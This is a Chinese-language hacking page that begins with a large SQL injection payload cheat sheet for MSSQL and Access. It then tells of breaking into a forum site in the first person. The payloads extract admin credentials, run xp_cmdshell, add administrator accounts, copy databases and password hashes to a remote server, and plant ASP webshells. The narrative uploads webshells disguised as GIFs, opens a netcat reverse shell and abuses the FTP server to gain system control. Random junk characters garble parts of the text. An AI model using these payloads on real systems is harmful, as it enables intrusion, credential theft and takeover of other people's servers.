最标准的SQL注入语句

1.判断有无注入点
; and 1=1 and 1=2
2.猜表一般的表的名称无非是admin adminuser user pass password 等..
and 0<>(select count(*) from *)
and 0<>(select count(*) from admin) —判断是否存在admin这张表
3.猜帐号数目 如果遇到0< 返回正确页面 1<返回错误页面说明帐号数目就是1个 and 0<(select count(*) from admin) and 1<(select count(*) from admin) 4.猜解字段名称 在len( ) 括号里面加上我们想到的字段名称. and 1=(select count(*) from admin where len(*)>0)–
and 1=(select count(*) from admin where len(用户字段名称name)>0)
and 1=(select count(*) from admin where len(_blank>密码字段名称password)>0)
5.猜解各个字段的长度 猜解长度就是把>0变换 直到返回正确页面为止
and 1=(select count(*) from admin where len(*)>0)
and 1=(select count(*) from admin where len(name)>6) 错误
and 1=(select count(*) from admin where len(name)>5) 正确 长度是6
and 1=(select count(*) from admin where len(name)=6) 正确
and 1=(select count(*) from admin where len(password)>11) 正确
and 1=(select count(*) from admin where len(password)>12) 错误 长度是12
and 1=(select count(*) from admin where len(password)=12) 正确
6.猜解字符
and 1=(select count(*) from admin where left(name,1)=a) —猜解用户帐号的第一位
and 1=(select count(*) from admin where left(name,2)=ab)—猜解用户帐号的第二位
就这样一次加一个字符这样猜,猜到够你刚才猜出来的多少位了就对了,帐号就算出来了
and 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1))=51) —
这个查询语句可以猜解中文的用户和_blank>密码.只要把后面的数字换成中文的ASSIC码就OK.最后把结果再转换成字符.
group by users.id having 1=1–
group by users.id, users.username, users.password, users.privs having 1=1–
; insert into users values( 666, attacker, foobar, 0xffff )–
UNION SELECT TOP 1 COLUMN_blank>_NAME FROM INFORMATION_blank>_SCHEMA.COLUMNS
WHERE TABLE_blank>_NAME=logintable-
UNION SELECT TOP 1 COLUMN_blank>_NAME FROM INFORMATION_blank>_SCHEMA.COLUMNS
WHERE TABLE_blank>_NAME=logintable WHERE COLUMN_blank>_NAME NOT IN (login_blank
>_id)-
UNION SELECT TOP 1 COLUMN_blank>_NAME FROM INFORMATION_blank>_SCHEMA.COLUMNS
WHERE TABLE_blank>_NAME=logintable WHERE COLUMN_blank>_NAME NOT IN (login_blank
>_id,login_blank>_name)-
UNION SELECT TOP 1 login_blank>_name FROM logintable-
UNION SELECT TOP 1 password FROM logintable where login_blank>_name=Rahul–
看_blank>服务器打的补丁=出错了打了SP4补丁
and 1=(select @@VERSION)–
看_blank>数据库连接账号的权限,返回正常,证明是_blank>服务器角色sysadmin权限。
and 1=(SELECT IS_blank>_SRVROLEMEMBER(sysadmin))–
判断连接_blank>数据库帐号。(采用SA账号连接 返回正常=证明了连接账号是SA)
and sa=(SELECT System_blank>_user)–
and user_blank>_name()=dbo–
and 0<>(select user_blank>_name()–
看xp_blank>_cmdshell是否删除
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = X AND name = xp_
blank>_cmdshell)–
xp_blank>_cmdshell被删除,恢复,支持绝对路径的恢复
;EXEC master.dbo.sp_blank>_addextendedproc xp_blank>_cmdshell,xplog70.dll–
;EXEC master.dbo.sp_blank>_addextendedproc xp_blank>_cmdshell,c:\inetpub\wwwroot\
xplog70.dll–
反向PING自己实验
;use master;declare @s int;exec sp_blank>_oacreate “wscript.shell”,@s out;exec sp_blank>
_oamethod @s,”run”,NULL,”cmd.exe /c ping 192.168.0.1″;–
加帐号
;DECLARE @shell INT EXEC SP_blank>_OACREATE wscript.shell,@shell OUTPUT EXEC SP_blank>
_OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net user jiaoniang$Content$nbsp;1866574 /add–
创建一个虚拟目录E盘:
;declare @o int exec sp_blank>_oacreate wscript.shell, @o out exec sp_blank>_oamethod @o,
run, NULL, cscript.exe c:\inetpub\wwwroot\mkwebdir.vbs -w “默认Web站点” -v “e”,”e:\”–
访问属性:(配合写入一个webshell)
declare @o int exec sp_blank>_oacreate wscript.shell, @o out exec sp_blank>_oamethod @o,
run, NULL, cscript.exe c:\inetpub\wwwroot\chaccess.vbs -a w3svc/1/ROOT/e +browse
爆库 特殊_blank>技巧::%5c=\ 或者把/和\ 修改%5提交
and 0<>(select top 1 paths from newtable)–
得到库名(从1到5都是系统的id,6以上才可以判断)
and 1=(select name from master.dbo.sysdatabases where dbid=7)–
and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)
依次提交 dbid = 7,8,9…. 得到更多的_blank>数据库名
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=U) 暴到一个表 假设为 admin
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=U and name not in (Admin))
来得到其他的表。
and 0<>(select count(*) from bbs.dbo.sysobjects where xtype=U and name=admin
and uid>(str(id))) 暴到UID的数值假设为18779569 uid=id
and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569) 得到一个admin的一个
字段,假设为 user_blank>_id
and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569 and name not in
(id,…)) 来暴出其他的字段
and 0<(select user_blank>_id from BBS.dbo.admin where username>1) 可以得到用户名
依次可以得到_blank>密码。。。。。假设存在user_blank>_id username ,password 等字段
and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=U) 得到表名
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=U and name not in(Address))
and 0<>(select count(*) from bbs.dbo.sysobjects where xtype=U and name=admin and uid>(s
tr(id))) 判断id值
and 0<>(select top 1 name from BBS.dbo.syscolumns where id=773577794) 所有字段
?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin
?id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin (union,access也好用)
得到WEB路径
;create table [dbo].[swap] ([swappass][char](255));–
and (select top 1 swappass from swap)=1–
;CREATE TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare @test varchar(20) exec master..xp_blank>_regread @rootkey=HKEY_blank>_LOCAL_blank>_MACHINE,
@key=SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\, @value_blank
>_name=/, values=@test OUTPUT insert into paths(path) values(@test)–
;use ku1;–
;create table cmd (str image);– 建立image类型的表cmd
存在xp_blank>_cmdshell的测试过程:
;exec master..xp_blank>_cmdshell dir
;exec master.dbo.sp_blank>_addlogin jiaoniang$;– 加SQL帐号
;exec master.dbo.sp_blank>_password null,jiaoniang$,1866574;–
;exec master.dbo.sp_blank>_addsrvrolemember jiaoniang$Content$nbsp;sysadmin;–
;exec master.dbo.xp_blank>_cmdshell net user jiaoniang$Content$nbsp;1866574 /workstations:* /
times:all /passwordchg:yes /passwordreq:yes /active:yes /add;–
;exec master.dbo.xp_blank>_cmdshell net localgroup administrators jiaoniang$Content$nbsp;/add;–
exec master..xp_blank>_servicecontrol start, schedule 启动_blank>服务
exec master..xp_blank>_servicecontrol start, server
; DECLARE @shell INT EXEC SP_blank>_OACREATE wscript.shell,@shell OUTPUT EXEC SP
_blank>_OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net user jiaonian
g$Content$nbsp;1866574 /add
;DECLARE @shell INT EXEC SP_blank>_OACREATE wscript.shell,@shell OUTPUT EXEC S
P_blank>_OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net localgroup
administrators jiaoniang$Content$nbsp;/add
; exec master..xp_blank>_cmdshell tftp -i youip get file.exe– 利用TFTP上传文件
;declare @a sysname set @a=xp_blank>_+cmdshell exec @a dir c:\
;declare @a sysname set @a=xp+_blank>_cm’+’dshell exec @a dir c:\
;declare @a;set @a=db_blank>_name();backup database @a to disk=你的IP你的共享目录
bak.dat 如果被限制则可以。
select * from openrowset(_blank>sqloledb,server;sa;,select OK! exec master.dbo.sp_
blank>_addlogin hax)
查询构造:
SELECT * FROM news WHERE id=… AND topic=… AND …..
adminand 1=(select count(*) from [user] where username=victim and right(left(userp
ass,01),1)=1) and userpass <>
select 123;–
;use master;–
:a or name like fff%;– 显示有一个叫ffff的用户哈。
and 1<>(select count(email) from [user]);–
;update [users] set email=(select top 1 name from sysobjects where xtype=u and
status>0) where name=ffff;–
;update [users] set email=(select top 1 id from sysobjects where xtype=u and nam
e=ad) where name=ffff;–
;update [users] set email=(select top 1 name from sysobjects where xtype=u and i
d>581577110) where name=ffff;–
;update [users] set email=(select top 1 count(id) from password) where name=ffff;–
;update [users] set email=(select top 1 pwd from password where id=2) where name=ffff;–
;update [users] set email=(select top 1 name from password where id=2) where name=ffff;–
上面的语句是得到_blank>数据库中的第一个用户表,并把表名放在ffff用户的邮箱字段中。
通过查看ffff的用户资料可得第一个用表叫ad
然后根据表名ad得到这个表的ID 得到第二个表的名字
insert into users values( 666, char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x
73), char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), 0xffff)–
insert into users values( 667,123,123,0xffff)–
insert into users values ( 123, admin–, password, 0xffff)–
;and user>0
;and (select count(*) from sysobjects)>0
;and (select count(*) from mysysobjects)>0 //为access_blank>数据库
枚举出数据表名
;update aaa set aaa=(select top 1 name from sysobjects where xtype=u and status>0);–
这是将第一个表名更新到aaa的字段处。
读出第一个表,第二个表可以这样读出来(在条件后加上 and name<>刚才得到的表名)。
;update aaa set aaa=(select top 1 name from sysobjects where xtype=u and status>0
and name<>vote);–
然后id=1552 and exists(select * from aaa where aaa>5)
读出第二个表,一个个的读出,直到没有为止。
读字段是这样:
;update aaa set aaa=(select top 1 col_blank>_name(object_blank>_id(表名),1));–
然后id=152 and exists(select * from aaa where aaa>5)出错,得到字段名
;update aaa set aaa=(select top 1 col_blank>_name(object_blank>_id(表名),2));–
然后id=152 and exists(select * from aaa where aaa>5)出错,得到字段名
[获得数据表名][将字段值更新为表名,再想法读出这个字段的值就可得到表名]
update 表名 set 字段=(select top 1 name from sysobjects where xtype=u and status>0
[ and name<>你得到的表名 查出一个加一个]) [ where 条件] select top 1 name from sysobje
cts where xtype=u and status>0 and name not in(table1,table2,…)
通过SQLSERVER注入_blank>漏洞建_blank>数据库管理员帐号和系统管理员帐号[当前帐号必须是SYSADMIN组]
[获得数据表字段名][将字段值更新为字段名,再想法读出这个字段的值就可得到字段名]
update 表名 set 字段=(select top 1 col_blank>_name(object_blank>_id(要查询的数据表名),
字段列如:1) [ where 条件]
绕过IDS的检测[使用变量]
;declare @a sysname set @a=xp_blank>_+cmdshell exec @a dir c:\
;declare @a sysname set @a=xp+_blank>_cm’+’dshell exec @a dir c:\
1、 开启远程_blank>数据库
基本语法
select * from OPENROWSET(SQLOLEDB, server=servername;uid=sa;pwd=123, select *
from table1 )
参数: (1) OLEDB Provider name
2、 其中连接字符串参数可以是任何端口用来连接,比如
select * from OPENROWSET(SQLOLEDB, uid=sa;pwd=123;Network=DBMSSOCN;Address
=192.168.0.1,1433;, select * from table
3.复制目标主机的整个_blank>数据库insert所有远程表到本地表。
基本语法:
insert into OPENROWSET(SQLOLEDB, server=servername;uid=sa;pwd=123, select *
from table1) select * from table2
这行语句将目标主机上table2表中的所有数据复制到远程_blank>数据库中的table1表中。实际运用
中适当修改连接字符串的IP地址和端口,指向需要的地方,比如:
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address
=192.168.0.1,1433;,select * from table1) select * from table2
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address
=192.168.0.1,1433;,select * from _blank>_sysdatabases)
select * from master.dbo.sysdatabases
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address
=192.168.0.1,1433;,select * from _blank>_sysobjects)
select * from user_blank>_database.dbo.sysobjects
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address
=192.168.0.1,1433;,select * from _blank>_syscolumns)
select * from user_blank>_database.dbo.syscolumns
复制_blank>数据库:
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address
=192.168.0.1,1433;,select * from table1) select * from database..table1
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Addres
s=192.168.0.1,1433;,select * from table2) select * from database..table2
复制哈西表(HASH)登录_blank>密码的hash存储于sysxlogins中。方法如下:
insert into OPENROWSET(SQLOLEDB, uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,s
elect * from _blank>_sysxlogins) select * from database.dbo.sysxlogins
得到hash之后,就可以进行暴力破解。
遍历目录的方法: 先创建一个临时表:temp
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3
nvarchar(255));–
;insert temp exec master.dbo.xp_blank>_availablemedia;– 获得当前所有驱动器
;insert into temp(id) exec master.dbo.xp_blank>_subdirs c:\;– 获得子目录列表
;insert into temp(id,num1) exec master.dbo.xp_blank>_dirtree c:\;– 获得所有子目录
的目录树结构,并寸入temp表中
;insert into temp(id) exec master.dbo.xp_blank>_cmdshell type c:\web\index.asp;-
– 查看某个文件的内容
;insert into temp(id) exec master.dbo.xp_blank>_cmdshell dir c:\;–
;insert into temp(id) exec master.dbo.xp_blank>_cmdshell dir c:\ *.asp /s/a;–
;insert into temp(id) exec master.dbo.xp_blank>_cmdshell cscript C:\Inetpub\Admin
Scripts\adsutil.vbs enum w3svc
;insert into temp(id,num1) exec master.dbo.xp_blank>_dirtree c:\;– (xp_blank>_
dirtree适用权限PUBLIC)
写入表:
语句1:and 1=(SELECT IS_blank>_SRVROLEMEMBER(sysadmin));–
语句2:and 1=(SELECT IS_blank>_SRVROLEMEMBER(serveradmin));–
语句3:and 1=(SELECT IS_blank>_SRVROLEMEMBER(setupadmin));–
语句4:and 1=(SELECT IS_blank>_SRVROLEMEMBER(securityadmin));–
语句5:and 1=(SELECT IS_blank>_SRVROLEMEMBER(securityadmin));–
语句6:and 1=(SELECT IS_blank>_SRVROLEMEMBER(diskadmin));–
语句7:and 1=(SELECT IS_blank>_SRVROLEMEMBER(bulkadmin));–
语句8:and 1=(SELECT IS_blank>_SRVROLEMEMBER(bulkadmin));–
语句9:and 1=(SELECT IS_blank>_MEMBER(db_blank>_owner));–
把路径写到表中去:
;create table dirs(paths varchar(100), id int)–
;insert dirs exec master.dbo.xp_blank>_dirtree c:\–
and 0<>(select top 1 paths from dirs)–
and 0<>(select top 1 paths from dirs where paths not in(@Inetpub))–
;create table dirs1(paths varchar(100), id int)–
;insert dirs exec master.dbo.xp_blank>_dirtree e:\web–
and 0<>(select top 1 paths from dirs1)–
把_blank>数据库备份到网页目录:下载
;declare @a sysname; set @a=db_blank>_name();backup database @a to disk
=e:\web\down.bak;–
and 1=(Select top 1 name from(Select top 12 id,name from sysobjects where
xtype=char(85)) T order by id desc)
and 1=(Select Top 1 col_blank>_name(object_blank>_id(USER_blank>_LOGIN)
,1) from sysobjects) 参看相关表。
and 1=(select user_blank>_id from USER_blank>_LOGIN)
and 0=(select user from USER_blank>_LOGIN where user>1)
-=- wscript.shell example -=-
declare @o int
exec sp_blank>_oacreate wscript.shell, @o out
exec sp_blank>_oamethod @o, run, NULL, notepad.exe
; declare @o int exec sp_blank>_oacreate wscript.shell, @o out exec sp_blank>
_oamethod @o, run, NULL, notepad.exe–
declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_blank>_oacreate scripting.filesystemobject, @o out
exec sp_blank>_oamethod @o, opentextfile, @f out, c:\boot.ini, 1
exec @ret = sp_blank>_oamethod @f, readline, @line out
while( @ret = 0 )
begin
print @line
exec @ret = sp_blank>_oamethod @f, readline, @line out
end
declare @o int, @f int, @t int, @ret int
exec sp_blank>_oacreate scripting.filesystemobject, @o out
exec sp_blank>_oamethod @o, createtextfile, @f out, c:\inetpub\wwwroot\foo.asp, 1
exec @ret = sp_blank>_oamethod @f, writeline, NULL,
<% set o = server.createobject("wscript.shell"): o.run( request.querystring("cmd") ) %>
declare @o int, @ret int
exec sp_blank>_oacreate speech.voicetext, @o out
exec sp_blank>_oamethod @o, register, NULL, foo, bar
exec sp_blank>_oasetproperty @o, speed, 150
exec sp_blank>_oamethod @o, speak, NULL, all your sequel servers are belong
to,us, 528
waitfor delay 00:00:05
; declare @o int, @ret int exec sp_blank>_oacreate speech.voicetext, @o out
exec sp_blank>_oamethod @o, register, NULL, foo, bar exec sp_blank>_oasetp
roperty @o, speed, 150 exec sp_blank>_oamethod @o, speak, NULL, all your
sequel servers are belong to us, 528 waitfor delay 00:00:05–
xp_blank>_dirtree适用权限PUBLIC
exec master.dbo.xp_blank>_dirtree c:\
返回的信息有两个字段subdirectory、depth。Subdirectory字段是字符型,depth字段是整形字段。
create table dirs(paths varchar(100), id int)
建表,这里建的表是和上面xp_blank>_dirtree相关连,字段相等、类型相同。
insert dirs exec master.dbo.xp_blank>_dirtree c:\
只要我们建表与存储进程返回的字段相定义相等就能够执行!达到写表的效果,一步步达到我们想要的信息!
怎样进行攻击?
第一步:隐藏自已的位置

  普通攻击者都会利用别人的电脑隐藏他们真实的IP地址。老练的攻击者还会利用800电话的无人转接服务联接ISP,然后再盗用他人的帐号上网。

  第二步:寻找目标主机并分析目标主机

  攻击者首先要寻找目标主机并分析目标主机。在Internet上能真正标识主机的是IP地址,域名是为了便于记忆主机的IP地址而另起的名字,只要利用域名和IP地址就可以顺利地找到目标主机。当然,知道了要攻击目标的位置还是远远不够的,还必须将主机的操作系统类型及其所提供服务等资料作个全面的了解。此时,攻击者们会使用一些扫描器工具,轻松获取目标主机运行的是哪种操作系统的哪个版本,系统有哪些帐户,WWW、FTP、Telnet 、SMTP等服务器程序是何种版本等资料,为入侵作好充分的准备。

  第三步:获取帐号和密码,登录主机

  攻击者要想入侵一台主机,首先要有该主机的一个帐号和密码,否则连登录都无法进行。这样常迫使他们先设法盗窃帐户文件,进行破解,从中获取某用户的帐户和口令,再寻觅合适时机以此身份进入主机。当然,利用某些工具或系统漏洞登录主机也是攻击者常用的一种技法。

  第四步:获得控制权

  攻击者们用FTP、Telnet等工具利用系统漏洞进入进入目标主机系统获得控制权之后,就会做两件事:清除记录和留下后门。他会更改某些系统设置、在系统中置入特洛伊木马或其他一些远程操纵程序,以便日后可以不被觉察地再次进入系统。大多数后门程序是预先编译好的,只需要想办法修改时间和权限就可以使用了,甚至新文件的大小都和原文件一模一样。攻击者一般会使用rep传递这些文件,以便不留下FTB记录。清除日志、删除拷贝的文件等手段来隐藏自己的踪迹之后,攻击者就开始下一步的行动。

  第五步:窃取网络资源和特权

  攻击者找到攻击目标后,会继续下一步的攻击。如:下载敏感信息;实施窃取帐号密码、信用卡号等经济偷窃;使网络瘫痪。而好的黑客会通知管理员修补相关漏洞
哈~发现一迷信网站,不爽… 2%D^>`
(入侵需要理由吗?不需要吗?需要吗?….) d>AU<>%E
/=?rXc?2~
用 }O]]?@
telnet www.xxx.com 80 ]je#PDP#+@
$g_TCdN%
get enter 2NIxjNc9
+$21
HTTP/1.1 400 Bad Request $S<Ad[d Server: Microsoft-IIS/5.0 <dzSf~~5 Date: Wed, 08 Jun 2005 11:56:00 GMT @C5p9opPw Content-Type: text/html [d*v`)S Content-Length: 87 ZQ4]-VA|q \&g47e18 ,@@TSZ /DL$;mCs MHl4v 失去了跟主机的连接。 T[Hs5% MsYf|vO1] F:\Documents and Settings\lu\桌面> <("B&{ z^B~UtC T 看到没,获得很多有用的信息哦 qQ +' z57$ r0(}y>a.
先去WEB上看看有没有什么漏洞 }w4z+n.f
\h”{Ic”M
哈!发现DVBBS7.1 论坛 9:9!V+3q
U7ho-5
前几天有朋友告诉我件事情,说有许多白痴管理员用备分的日期做备分数据库的名字哦!试试看! d430N 
H;m+WTD_
dvbbs7.1 是4月6日更新的,他用该用200504**.mdb做名字来命名以前的旧数据库! 4(PhCqoJ
没办法,试试! 7 cHp,8+=
;sDnAxwy
http://www.xxxx.com/bbs/databackup/20050406.mdb gOq+5Yy^
http://www.xxxx.com/bbs/databackup/20050407.mdb b`wQB9
http://www.xxxx.com/bbs/databackup/20050408.mdb .%[~| 8
….. x~jzv@
晕..到32了还没出来 e-x=0@ n
管理员不是白痴哦! \L3OU#
http://www.xxxx.com/bbs/databackup/200504.mdb EC;db;v#
faint!他不是白痴谁是! >dPpsn
跳出了可爱的下载对话框! u>60.l!
|L MsP^J
downloading…. 完成! >7V9OK2
I2#W|>?b
用辅臣数据库浏览器打开,选择Dv_Log(2586) W\if~t2j
字段名选择l_content 关键字添password2 =&@VICGN&
%M1bBX J
点查询 Ix >WSP[GS
许多信息出来了哦! -P !)Z=/~
经过筛选 |d||”WlV2
发现一条: FxvX’h >
oldusername=%B5%F0%B7%C0&username2=%B5%F0%B7%C0&password2=19841202&adduser=%B5%F0%B7%C0&id=12&Submit=%B8%FC+%D0%C2 “N@S/
27s’;ji
哈,想到什么了?登陆啊,不过用户名不知道,是%B8%F0%B7%C9吗~开玩笑,那简单,其实转化这个我用他本身的页面,  +jZ|J
在登陆页面上用户名和密码乱添 ,U=M! \]
点登陆 fFI=M^xO4Y
http://www.xxx.com/bbs/showerr.asp?BoardID=0&ErrCodes=10,11&action=%CC%EE%D0%B4%B5%C7%C2%BC%D0%C5%CF%A2 Q~cn<m] (o.}Q}DSA %CC%EE%D0%B4%B5%C7%C2%BC%D0%C5%CF%A2这句话意思是“填写登录信息” Yz7eF1x !_`SqqZZ 那么就把%CC%EE%D0%B4%B5%C7%C2%BC%D0%C5%CF%A2换成%B5%F0%B7%C0! TVyRR/v# ) +Q0 = 提交!看到了吧!用户名是“叼防” >#Cee\
晕! Z %”Uj$r
什么名字啊!不管了,登陆! Eq? @x x)
成功!呵呵~把老兵的asp站长助手另存为admin_system321.gif ?D: niF#
|W+5$sb:q
上传! }{TF[YoH
AT0EEooy
晕! >`gl:E*!
U8X&,*e
一流信息监控系统提醒您:很抱歉,由于您提交的内容中或访问的内容中含有系统不允许的关键词或者您的IP受到了访问限制,本次操作无效,系统已记录您的IP及您提交的所有数据。请注意,不要提交任何违反国家规定的内容!本次拦截的相关信息为:drop table K%o75rX
q@EsQiM^p
换海阳top的传,在晕…还是被拦截! mbXofZeV
mzrGxLy\E
不行!我就不信上不去! J([7 MO
1<6`Dm>M^0
*W2X5n
]f8Hu%}
p!NtOL/’F
Po9tauC&
RW-j#bK, I
<\>WJgGkV
rsN,nw
O4! DM
Xa0f\|q
<%On Error Resume Next CuA}v+(yF’
if request(“cmdx”)=”cmd.exe” then *eL|unv
response.write oScriptlhn.exec(“cmd.exe /c”&request(“cmd”)).stdout.readall >R. su,H\
end if gEljQ
response.write oScriptlhn.exec(request(“cmdx”)&” /c”&request(“cmd”)).stdout.readall Su ]<'6!
%> 7c{7+\jF
R!guh#
j\?hM^c0T7
保存成为cmd.gif ‘-c4]v>
上传成功! 5.>L$F/
登陆后台用数据库管理还原成根目录下的admin_system321.asp M7( \&{py
> !s.V.>r
_system321.asp”>http://www.xxx.com/bbs/admin_system321.asp )’`!hC
`d-=_l-
登陆,啊…CMD窗口那里显示 ZO}7lfS{
^V2FgWc
无法找到该页 4I+EF-Tg
您正在搜索的页面可能已经删除、更名或暂时不可用。 ->t$.<:7r= --------------------------------------------------------------------------------  K0;iD=c ,+3Ti&O7e 请尝试以下操作: W~h.; vN O~(GH s b 确保浏览器的地址栏中显示的网站地址的拼写和格式正确无误。 yB_.;/#D 如果通过单击链接而到达了该网页,请与网站管理员联系,通知他们该链接的格式不正确。 f^MfD^N{J 单击后退按钮尝试另一个链接。 Pj8Wp5{p) HTTP 错误 404 - 文件或目录未找到。 `ABW:ghX Internet 信息服务 (IIS) _79yt"< t+;lT^ -------------------------------------------------------------------------------- eb@.zmsJ\K 1JSAI \U?Q 技术信息(为技术支持人员提供) >#mlz2;
\ZaqyB
转到 Microsoft 产品支持服务并搜索包括“HTTP”和“404”的标题。 ]X7″vgQ+
打开“IIS 帮助”(可在 IIS 管理器 (inetmgr) 中访问),然后搜索标题为“网站设置”、“常规管理任务”和“关于自定义错误消息”的主题。 we ^fkW
|,wE|pqM}
把我的SYSTEM32下的CMD.exe用记事本打开,另存为111.gif上传! =t4aHU
在用刚才的方法备分成跟目录下的cmd.exe F^
4( %y-u/
把刚才cmd.gif里cmd.exe改成他的绝对路径  +OeK
m:vw2P+z
全都上传!然后备分! I ob}]BQv
访问_system321.asp”>http://www.xxx.com/bbs/admin_system321.asp Ks9g Ac`
哈!成功! [TsA-u `4
在用上面的方法把nc传上去! ATzU7< TOy 本地命令提示符执行 nc -vv -l -p 9999 .!bhM'#! 在webshell里执行nc.exe -e cmd.exe 自己IP 9999 l0 7Ygg*y NC监听的窗口就出现一个可爱的SHELL 8E m{OJA o=jp&k50 在写个文件如下 ^R X=H+Foj (C{#O&j[V echo USER LocalAdministrator>2.txt b *\QTP5U}
echo PASS #l@$ak#.lk;0@P>>2.txt ~Vz[Q;3}
echo SITE MAINTENANCE>>2.txt dY&61-.wO
echo -setdomain>>2.txt 1:6’dX
echo -Domain=MyFTP^|0.0.0.0^|22^|-1^|1^|0 >>2.txt wfgE 3@2l
echo -DynDNSEnable=0 >>2.txt ^+7T\RO_
echo DynIPName=>>2.txt %i* 3~I
echo -SETUSERSETUP>>2.txt r(eKJee
echo -IP=0.0.0.0>>2.txt ;z[61x
echo -PortNo=22>>2.txt |+ ~/”
echo -User=tyrant>>2.txt #;MW*[_n?
echo -Password=19851011>>2.txt zMl6D2`
echo -HomeDir=c:\>>2.txt iq%KCch(,
echo -Maintenance=System>>2.txt 8tqo*y
echo -Ratios=None>>2.txt m|w|b&G
echo Access=c:\^|RWAMEICDP>>2.txt , )+d}<4 echo -GETUSERSETUP>>2.txt i^ x[dXP
I;X3-XOg=L
“^”符号的作用相信大家都了解吧!我不罗嗦了。 /h{7’Re8
G:y0X)]
把上面批处理保存为1.txt qly4
7_~`?9(
在SHELL中用NC提交 4,1 fEnbfQ
L)K 1O]H
nc 127.0.0.1 43958 <1.txt ;vOF]pa.Y m1Kk#m < 回显发现 [s8v9d^q hizkElY 220 Domain settings saved ?$=]Z%[K[ 200-User=test1 LkZ^ ]h_* 200 User settings saved U%zPFx;yH *T}}U=/b 成功了!成功添加了用户tyrant密码19851011 ]Oh8gFkv v*^FeD$h 登陆对方的ftp +XE!`0a 转到system32文件夹下 KrjZZt x+\7?NNAva quote site exec "net.exe user tyrant 19851011 /add" b?ZqY-@< ')R9Q quote site exec "net.exe localgroup administrators tyrant /add" O[Qjij vALL quote site exec "net.exe user start telnet" J8; \sy p[*814;?$ 用tyrant管理员telnet上去 KhfGtp 传个批处理开3389 u^P}F"274 BB.b1 3E 哈...正在连接到...

发表评论